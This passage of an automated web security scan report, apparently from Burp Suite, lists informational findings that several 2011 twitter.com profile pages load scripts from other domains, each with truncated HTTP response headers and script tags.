Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/twitter.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261955" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261955" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/geov1.js?1296261955" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/api.js?1296261955" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261955" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/dismissable.js?1296261955" type="text/javascript"></script>
...[SNIP]...

18.330. http://twitter.com/Gr8BosFoodBank previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Gr8BosFoodBank

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836
http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836
http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836
http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-79208-29747
ETag: "a6d77c28a643e235a002a7eb55dd8452"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00773
Content-Type: text/html; charset=utf-8
Content-Length: 53288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/twitter.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247836" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247836" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247836" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/api.js?1296247836" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247836" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/dismissable.js?1296247836" type="text/javascript"></script>
...[SNIP]...

18.331. http://twitter.com/Harvard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Harvard

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248
http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248
http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248
http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265976-30452-57191
ETag: "f592e2869b28d974ff30653c3b748799"
Last-Modified: Sat, 29 Jan 2011 01:52:56 GMT
X-Runtime: 0.01723
Content-Type: text/html; charset=utf-8
Content-Length: 51819
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/twitter.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296247248" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296247248" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/geov1.js?1296247248" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296245718/javascripts/api.js?1296247248" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296247248" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/dismissable.js?1296247248" type="text/javascript"></script>
...[SNIP]...

18.332. http://twitter.com/Jarvis_Green previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/Jarvis_Green

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a1.twimg.com/a/1296258363/javascripts/following.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265288-56506-41031
ETag: "1fbdd011dd022432b9be5211b927eb5e"
Last-Modified: Sat, 29 Jan 2011 01:41:28 GMT
X-Runtime: 0.00821
Content-Type: text/html; charset=utf-8
Content-Length: 29885
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/following.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.333. http://twitter.com/JennyMcCarthy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/JennyMcCarthy

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-863-44101
ETag: "f38aec6749f0462266c3dd505da4c784"
Last-Modified: Sat, 29 Jan 2011 01:53:22 GMT
X-Runtime: 0.01378
Content-Type: text/html; charset=utf-8
Content-Length: 49671
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.334. http://twitter.com/John_W_Henry previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/John_W_Henry

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266003-90291-22061
ETag: "39b5637104095258c2612985611f2081"
Last-Modified: Sat, 29 Jan 2011 01:53:23 GMT
X-Runtime: 0.00864
Content-Type: text/html; charset=utf-8
Content-Length: 40419
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.335. http://twitter.com/KaseyRKahl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/KaseyRKahl

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265968-89789-38719
ETag: "91cc7fb3c644ed10961b8761bb947762"
Last-Modified: Sat, 29 Jan 2011 01:52:48 GMT
X-Runtime: 0.01025
Content-Type: text/html; charset=utf-8
Content-Length: 50928
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.336. http://twitter.com/KhloeKardashian previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/KhloeKardashian

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266008-48453-14084
ETag: "a10b004421cd49a7bf1036242f788900"
Last-Modified: Sat, 29 Jan 2011 01:53:28 GMT
X-Runtime: 0.01326
Content-Type: text/html; charset=utf-8
Content-Length: 52081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125" type="text/javascript"></script>
...[SNIP]...

18.337. http://twitter.com/KimKardashian previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/KimKardashian

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296263125
http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/api.js?1296263125
http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296263125
http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296263125
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:58 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266038-98911-11256
ETag: "162e94dddb4eb4f4491a26acce7fb49a"
Last-Modified: Sat, 29 Jan 2011 01:53:58 GMT
X-Runtime: 0.37290
Content-Type: text/html; charset=utf-8
Content-Length: 49623
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIiVodHRwOi8vdHdpdHRlci5jb20vS2ltS2FyZGFz%250AaGlhbjoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--dd57a4fe4c4e017cb678d4f77a9a59706b7869bb; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/twitter.js?1296263125" type="text/javascript"></script>
